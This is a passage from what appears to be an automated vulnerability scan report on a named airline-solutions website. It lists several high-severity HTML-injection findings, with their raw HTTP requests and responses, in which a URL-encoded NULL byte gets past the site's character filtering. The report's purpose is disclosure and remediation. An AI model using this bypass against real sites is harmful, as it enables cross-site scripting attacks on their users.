Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321409; expires=Thu, 06-Oct-2011 09:52:56 GMT; path=/
Set-Cookie: exp_last_activity=1286376776; expires=Thu, 06-Oct-2011 09:52:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A2%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:13 GMT
Pragma: no-cache
Content-Length: 7182
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/?%008f3cb"><a>f542c5fd65d=1">
...[SNIP]...

3.57. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f8621"><a>0262ec90d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8621"><a>0262ec90d8c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution?%00f8621"><a>0262ec90d8c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321476; expires=Thu, 06-Oct-2011 09:47:24 GMT; path=/
Set-Cookie: exp_last_activity=1286376444; expires=Thu, 06-Oct-2011 09:47:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:47:43 GMT
Pragma: no-cache
Content-Length: 7073
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airline_distribution?%00f8621"><a>0262ec90d8c=1">
...[SNIP]...

3.58. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0072bb9<a>62a409e2a4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72bb9<a>62a409e2a4b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution?%0072bb9<a>62a409e2a4b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321476; expires=Thu, 06-Oct-2011 09:51:00 GMT; path=/
Set-Cookie: exp_last_activity=1286376660; expires=Thu, 06-Oct-2011 09:51:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:51:06 GMT
Pragma: no-cache
Content-Length: 7069
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>62a409e2a4b=1">airline distribution?%0072bb9<a>62a409e2a4b=1</a>
...[SNIP]...

3.59. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f69a5<a>8da31d06484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f69a5<a>8da31d06484 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution/?%00f69a5<a>8da31d06484=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321432; expires=Thu, 06-Oct-2011 09:51:16 GMT; path=/
Set-Cookie: exp_last_activity=1286376675; expires=Thu, 06-Oct-2011 09:51:16 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:51:25 GMT
Pragma: no-cache
Content-Length: 7125
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>8da31d06484=1">?%00f69a5<a>8da31d06484=1</a>
...[SNIP]...

3.60. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0028f11"><a>3cc3486bb3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28f11"><a>3cc3486bb3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution/?%0028f11"><a>3cc3486bb3c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321432; expires=Thu, 06-Oct-2011 09:47:30 GMT; path=/
Set-Cookie: exp_last_activity=1286376450; expires=Thu, 06-Oct-2011 09:47:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:47:52 GMT
Pragma: no-cache
Content-Length: 7129
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airline_distribution/?%0028f11"><a>3cc3486bb3c=1">
...[SNIP]...

3.61. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fa3b"><a>75d7acc3fac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa3b"><a>75d7acc3fac in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports?%007fa3b"><a>75d7acc3fac=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:55:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321483; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_last_activity=1286376933; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:55:57 GMT
Pragma: no-cache
Content-Length: 6741
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airports?%007fa3b"><a>75d7acc3fac=1">
...[SNIP]...

3.62. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ab78d<a>f372b6bb1f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab78d<a>f372b6bb1f8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports?%00ab78d<a>f372b6bb1f8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:59:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321483; expires=Thu, 06-Oct-2011 09:59:27 GMT; path=/
Set-Cookie: exp_last_activity=1286377166; expires=Thu, 06-Oct-2011 09:59:27 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:59:48 GMT
Pragma: no-cache
Content-Length: 6737
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>f372b6bb1f8=1">airports?%00ab78d<a>f372b6bb1f8=1</a>
...[SNIP]...

3.63. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9d17"><a>b085801efdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9d17"><a>b085801efdc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports/?%00f9d17"><a>b085801efdc=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321423; expires=Thu, 06-Oct-2011 09:56:26 GMT; path=/
Set-Cookie: exp_last_activity=1286376986; expires=Thu, 06-Oct-2011 09:56:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:56:37 GMT
Pragma: no-cache
Content-Length: 6785
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airports/?%00f9d17"><a>b085801efdc=1">
...[SNIP]...

3.64. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %007842c<a>5631a4947eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7842c<a>5631a4947eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports/?%007842c<a>5631a4947eb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:59:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321423; expires=Thu, 06-Oct-2011 09:59:50 GMT; path=/
Set-Cookie: exp_last_activity=1286377190; expires=Thu, 06-Oct-2011 09:59:50 GMT; path=/
